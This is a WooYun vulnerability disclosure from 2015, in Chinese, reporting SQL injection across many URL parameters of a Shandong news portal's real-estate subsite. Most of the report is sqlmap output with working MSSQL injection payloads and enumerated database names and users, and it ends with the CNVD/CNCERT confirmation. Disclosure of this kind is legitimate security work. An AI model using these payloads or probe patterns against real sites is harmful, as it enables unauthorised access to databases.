当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159227

漏洞标题:中国山东网房产分站SQL注入打包

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-12-16 12:06

修复时间:2016-01-25 18:11

公开时间:2016-01-25 18:11

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-01-25: 细节向公众公开

简要描述:

RT

详细说明:

测试太久,似乎也不是怎样这个站,下次找到不提交这么多,举几个简单提交吧。
中国山东网(**.**.**.**)是经国务院新闻办公室批准成立的全国重点新闻网站,由山东省人民政府新闻办公室主管、走向世界杂志社主办,新之航传媒集团山东网新传媒有限公司总策划运营,于1996年正式开通。
注入点一:

http://**.**.**.**/pinggu/result.aspx?id=1051


id存在注入,SQL添加--level 3 --risk 3测试

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 176 HTTP(s) req
uests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1051 AND 7764=7764
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1051 AND 8787=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(101)+C
HAR(101)+CHAR(113)+(SELECT (CASE WHEN (8787=8787) THEN CHAR(49) ELSE CHAR(48) EN
D))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113)))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1051; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1051 WAITFOR DELAY '0:0:5'--
---
[19:44:27] [INFO] testing Microsoft SQL Server
[19:44:27] [INFO] confirming Microsoft SQL Server
[19:44:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[19:44:29] [INFO] fetching current user
[19:44:29] [INFO] retrieved: 91haofang2010
current user:    '91haofang2010'
[19:44:29] [INFO] fetching current database
[19:44:29] [INFO] retrieved: 91haofang
current database:    '91haofang'
[19:44:29] [INFO] testing if current user is DBA
current user is DBA:    False


1.jpg


注入点二:

http://**.**.**.**/broker/index.aspx?area=1&seachText=1


area存在注入

sqlmap identified the following injection points with a total of 162 HTTP(s) req
uests:
---
Place: GET
Parameter: area
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: area=1; WAITFOR DELAY '0:0:5'--&seachText=1
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: area=1 WAITFOR DELAY '0:0:5'--&seachText=1
---
[19:55:37] [INFO] testing Microsoft SQL Server
[19:55:37] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[19:55:48] [INFO] confirming Microsoft SQL Server
[19:55:58] [INFO] adjusting time delay to 2 seconds due to good response times
[19:56:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[19:56:00] [INFO] fetching current user
[19:56:00] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[19:56:00] [INFO] retrieved: 91
[19:56:28] [ERROR] invalid character detected. retrying..
[19:56:28] [WARNING] increasing time delay to 3 seconds
haofang2010
current user:    '91haofang2010'
[19:58:55] [INFO] fetching current database
[19:58:55] [INFO] retrieved: 91h
[19:59:42] [ERROR] invalid character detected. retrying..
[19:59:42] [WARNING] increasing time delay to 4 seconds
aofang
current database:    '91haofang'
[20:01:21] [INFO] testing if current user is DBA
current user is DBA:    False


2.jpg


注入点三:

http://**.**.**.**/broker/index.aspx?cyzstpzt=1&area=1&sub_area=&cid=869


area、sub_area、cid存在注入,直接sqlmap添加--level 3 --risk 3测试

GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 2261 HTTP(s) re
quests:
---
Place: GET
Parameter: sub_area
    Type: boolean-based blind
    Title: Generic boolean-based blind - Parameter replace (original value)
    Payload: cyzstpzt=1&area=1&sub_area=(SELECT (CASE WHEN (1767=1767) THEN '' E
LSE 1/(SELECT 0) END))&cid=869
Place: GET
Parameter: area
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: cyzstpzt=1&area=1; WAITFOR DELAY '0:0:5'--&sub_area=&cid=869
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: cyzstpzt=1&area=1 WAITFOR DELAY '0:0:5'--&sub_area=&cid=869
Place: GET
Parameter: cid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cyzstpzt=1&area=1&sub_area=&cid=869 AND 6498=6498
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: cyzstpzt=1&area=1&sub_area=&cid=869; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: cyzstpzt=1&area=1&sub_area=&cid=869 WAITFOR DELAY '0:0:5'--
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: area, type: Unescaped numeric (default)
[1] place: GET, parameter: sub_area, type: Unescaped numeric
[2] place: GET, parameter: cid, type: Unescaped numeric
[q] Quit
> 0
[20:33:42] [INFO] testing Microsoft SQL Server
[20:33:42] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[20:33:48] [INFO] confirming Microsoft SQL Server
[20:33:59] [INFO] adjusting time delay to 3 seconds due to good response times
[20:34:02] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[20:34:02] [INFO] fetching current user
[20:34:02] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[20:34:02] [INFO] retrieved: 91haofa
[20:35:43] [ERROR] invalid character detected. retrying..
[20:35:43] [WARNING] increasing time delay to 4 seconds
ng2010
current user:    '91haofang2010'
[20:37:32] [INFO] fetching current database
[20:37:32] [INFO] retrieved: 91haofang
current database:    '91haofang'
[20:39:56] [INFO] testing if current user is DBA
current user is DBA:    False


3.jpg


注入点四:

http://**.**.**.**/broker/index.aspx?cid=869


cid存在注入

4.jpg


注入点五:

http://**.**.**.**/loupan/index.aspx?jiage1=3000&jiage2=5000&seachText=1


jiage1、jiage2存在注入

sqlmap identified the following injection points with a total of 175 HTTP(s) req
uests:
---
Place: GET
Parameter: jiage2
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jiage1=3000&jiage2=5000 AND 2514=2514&seachText=1
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: jiage1=3000&jiage2=5000 AND 4818=CONVERT(INT,(SELECT CHAR(113)+CHAR
(108)+CHAR(119)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (4818=4818) THEN CHAR(49)
 ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(107)+CHAR(114)+CHAR(113)))&seachTe
xt=1
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: jiage1=3000&jiage2=5000; WAITFOR DELAY '0:0:5'--&seachText=1
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: jiage1=3000&jiage2=5000 WAITFOR DELAY '0:0:5'--&seachText=1
Place: GET
Parameter: jiage1
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jiage1=3000 AND 3819=3819&jiage2=5000&seachText=1
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: jiage1=3000 AND 3955=CONVERT(INT,(SELECT CHAR(113)+CHAR(108)+CHAR(1
19)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (3955=3955) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(113)+CHAR(117)+CHAR(107)+CHAR(114)+CHAR(113)))&jiage2=5000&seachTe
xt=1
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: jiage1=3000; WAITFOR DELAY '0:0:5'--&jiage2=5000&seachText=1
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: jiage1=3000 WAITFOR DELAY '0:0:5'--&jiage2=5000&seachText=1
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: jiage1, type: Unescaped numeric (default)
[1] place: GET, parameter: jiage2, type: Unescaped numeric
[q] Quit
> 0
[20:58:09] [INFO] testing Microsoft SQL Server
[20:58:09] [INFO] confirming Microsoft SQL Server
[20:58:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[20:58:10] [INFO] fetching current user
[20:58:10] [INFO] retrieved: 91haofang2010
current user:    '91haofang2010'
[20:58:10] [INFO] fetching current database
[20:58:11] [INFO] retrieved: 91haofang
current database:    '91haofang'
[20:58:11] [INFO] testing if current user is DBA
current user is DBA:    False
available databases [22]:
[*] 91haofang
[*] adv_new
[*] bbs
[*] cms_newair
[*] jiaju
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SD_QIYE
[*] SDSW20_Ads
[*] SDSW20_Ask
[*] SDSW20_Digg
[*] SDSW20_HR
[*] SDSW20_Main
[*] SDSW20_Other
[*] SDSW20_Rank
[*] SDSW20_Video
[*] SDSW20_Video_old
[*] tempdb
[*] yycar


5.jpg


注入点六:

http://**.**.**.**/shop/index.aspx?hybh=J11101406010787


hybh存在注入

6.jpg


注入点七:

http://**.**.**.**/sale/viewsale.aspx?id=505264


id存在注入

7.jpg


注入点八:

http://**.**.**.**/ajaxpro/reg_reg_form,App_Web_doxbtz37.ashx (POST)
{"name":"admin"}


name存在注入

sqlmap identified the following injection points with a total of 24 HTTP(s) requ
ests:
---
Place: (custom) POST
Parameter: JSON #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: {"name":"admin' AND 9999=9999 AND 'PtXy'='PtXy"}
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: {"name":"admin'; WAITFOR DELAY '0:0:5'--"}
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: {"name":"admin' WAITFOR DELAY '0:0:5'--"}
---
[22:18:24] [INFO] testing Microsoft SQL Server
[22:18:24] [INFO] confirming Microsoft SQL Server
[22:18:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[22:18:25] [INFO] fetching current user
[22:18:25] [INFO] retrieving the length of query output
[22:18:25] [INFO] retrieved: 13
[22:18:43] [INFO] retrieved: 91haofang2010
current user:    '91haofang2010'
[22:18:43] [INFO] fetching current database
[22:18:43] [INFO] retrieving the length of query output
[22:18:43] [INFO] retrieved: 9
[22:18:58] [INFO] retrieved: 91haofang
current database:    '91haofang'
[22:18:58] [INFO] testing if current user is DBA
current user is DBA:    False
database management system users [2]:
[*] 91haofang2010
[*] sa
available databases [22]:
[*] 91haofang
[*] adv_new
[*] bbs
[*] cms_newair
[*] jiaju
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SD_QIYE
[*] SDSW20_Ads
[*] SDSW20_Ask
[*] SDSW20_Digg
[*] SDSW20_HR
[*] SDSW20_Main
[*] SDSW20_Other
[*] SDSW20_Rank
[*] SDSW20_Video
[*] SDSW20_Video_old
[*] tempdb
[*] yycar


11--8.jpg


注入点九:

http://**.**.**.**/sale/index.aspx?area=10&jiage1=50&jiage2=80&mianji1=50&mianji2=100&shi=1&seachText=1
http://**.**.**.**/news/index.aspx?seachXlid=960
http://**.**.**.**/rent/viewrent.aspx?id=592637
http://**.**.**.**/sreach.aspx?keystr=房价反弹
http://**.**.**.**/sale/Compare.aspx?housesize=872813,872613&type=sell
http://**.**.**.**/loupan/index.aspx?cid=868&jiage1=3000&jiage2=5000&area=560&seachText=1
http://**.**.**.**/broker/index.aspx?cid=868&area=560&seachText=1
http://**.**.**.**/loupan/index.aspx?area=&sq=&jiage1=&jiage2=&mianji1=&mianji2=&wyyt=&shi=&ting=&wei=&wylx=42&maidian=&cq=&cx=&zxcd=&jzlb=&xxly=&kjgd=&seachText=&sort=&cid=868
area、jiage1、jiage2、mianji1、mianji2、wyyt、wylx、cid均存在注入,添加--level 3 --risk 3
http://**.**.**.**/graph/datafile/city-year-line-index.aspx?cid=868
http://**.**.**.**/news/index.aspx?seachXlid=768
http://**.**.**.**/loupan/module/tjly.aspx?id=4110&num=2&cid=869


多个参数存在注入存在注入

8.jpg


9.jpg


10.jpg


12.jpg


13.jpg


14.jpg


15.jpg


16.jpg


17.jpg


18.jpg


其他库没有权限可以理解,当前库也获取不到表,难道是空的?或许需要绕过?那就不继续了!~~~

漏洞证明:

见详细说明

修复方案:

过滤?

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-18 11:49

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发山东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无